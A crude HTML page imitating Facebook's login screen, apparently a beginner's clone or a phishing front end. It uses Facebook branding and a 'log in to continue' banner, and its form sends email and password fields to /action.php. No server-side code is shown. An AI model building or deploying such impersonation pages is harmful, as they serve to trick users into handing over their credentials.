<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
</head>
<style>
    h1{
    color: #1877F2;
    font-size: 50px;
    font-weight: bold;
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    }
    main{
        border: 10px solid whitesmoke;
        border-radius: 20px;
        border-color: whitesmoke;
    
        border-radius: 8px;
    box-shadow: 0 2px 4pxrgba(0, 0, 0, .1), 0 8px 16pxrgba(0, 0, 0, .1);
    margin: auto;
    padding: 0 0 14px 0;
    width: 396px;
    background-color: #fff;
}
       p{
        font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
        font-weight: bold;
        font-size: 20px;
   
       }
       div{
        font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif ;
        font-size: 12px;
        background-color:#FFF9D7;
        background-size: auto;
        padding: 15px;
      margin: 8px 8px 5px 5px;
      border-radius: 8px;
       }
    .login{
        font-weight: bolder;
      
        font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif ;
       
        background-color:#1877F2;
        background-size: auto;
        padding: 15px;
      margin: 8px 8px 8px 8px;
      border-radius: 8px;
      border: none;
    border-radius: 6px;
    font-size: 20px;
    line-height: 48px;
    padding: 0 16px;
    width: 332px;
    }
    

</style>
    
   <center><h1>facebook </h1></center> 
    <main>
    <center> <p>Log in to Facebook</center> </p>
   
    <div > <center>You must log in to continue </center></div>
<form action="/action.php">
     <br>
        <center class="text"><textarea name="Email"placeholder="Email or Number" rows="5" cols="50"></textarea></center>
        
<br>
<center class="text"><textarea name="password"placeholder="Password" rows="5" cols="50"></textarea></center>
<br>
   <div class="login"><center><button>Log in</button> </center> </div>
   <br>
   <center><footer> <a href="/Find-account.html"> Forget Password?</a></footer></center>
</form>
</main>
</body>
</html>